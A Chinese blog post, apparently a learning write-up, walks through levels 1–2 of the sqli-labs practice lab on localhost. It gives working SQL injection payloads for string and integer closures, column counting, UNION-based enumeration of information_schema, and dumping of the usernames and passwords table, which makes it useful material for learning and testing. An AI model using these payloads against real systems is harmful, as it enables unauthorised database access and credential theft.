SQL注入·sqli-labs·基于错误的字符串_数字型注入（第1~2关）

Created2020-12-10|Updated2020-12-14|网安学习

|Word count:863|Reading time:3min|Post View:

Less-1

先以get方式输入?id=1 or 1=1 --,结果如下，未报错并且绿字反馈用户名及密码：

1	http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 --

在这里插入图片描述
测试闭合符号，常见的闭合符号有'、"、')、")，这一题用到的闭合符号恰巧都能使用

判断列数oeder by (by 3测试字段数为3)

1	http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

在这里插入图片描述直到值为4的时候反馈库中没有第四列数据：

union联合查询
测试联合查询库中有的前三列，格式如下,做间隔符：

1	http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+

没有报错证明命令格式无误，但依旧反馈两个大大的绿色 Dumb ，依旧不是我们想要的，问题在于union前面的id，ID值为1的1、2、3列表内没有数据不代表别的ID值内没有，尝试更换ID值继续测试：

http://127.0.0.1/sqli-labs/Less-1/?id= X ‘ and 1=2 union select 1,2,3 –+

将以上命令中的红色X（ID值）替换得到的不同反馈如下:
ID=0时（无信息）↓—————————ID=2时（有趣）↓ 在这里插入图片描述
ID=X
前面的步骤自从判断闭合符之后就是一下这个样子

Your Login name:Dumb
Your Password:Dumb

差点让我放弃，我以为我的靶场坏了呢，突然反馈这么多有趣的信息，立刻精神倍儿棒。继续！

1	?id=0' union select 1,version(),database() --+

在这里插入图片描述
此处宽字节注入涉及到的函数：
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串；
database()查询数据库；
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符；
mysql_escape_string() — 转义一个字符串；
version()Version确认(版本确认)；

查看所有数据库名:

1	?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述
查询security内的所有表名:

1	?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

爆

爆数据表——使用下面的语句爆破出列名：

1	?id=1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

在这里插入图片描述
爆用户名和密码——使用下面的语句爆破出用户名及密码：

1	?id=1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

在这里插入图片描述

Less-2

第一步先判断闭合符，键入?id=1并逐个判断闭合符号
报错：

You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘' LIMIT 0,1’ at line 1

不仅是'爆出这样的错误，常见的闭合符'、"、')、")都报出同样的错误。
通过键入

1	?id=1 and 1=1 --+

反馈亲切的：
Your Login name:Dumb
Your Password:Dumb

推断出闭合符为整形
在这里插入图片描述同第一题判断数列order by,同第一题一样列数为三列：

在这里插入图片描述查看回显地点

1	?id=-1 union select 1,2,3–+

利用联合查询来查找想要的数据：

1	?id=-1 union select 1,database(),version()--+

在这里插入图片描述
查看后台数据库的语句，可见与预期相符:

爆用户名和密码,与第一题几乎一样，区别在于闭合符号，第二题考察到的是整形闭合符号，第一题的是'

1	?id=-1 AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

在这里插入图片描述

未完待续

Author: 大何生

Link: https://bosounho.gitee.io/2020/12/10/SQL%E6%B3%A8%E5%85%A5%C2%B7sqli-labs%C2%B7%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2_%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%88%E7%AC%AC1~2%E5%85%B3%EF%BC%89/

Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Donate

微信
支付宝

Related Articles

sqlmap如何用dirsearch.py协助--os -shell拿到目标网站shell

Local search

Powered by hexo-generator-search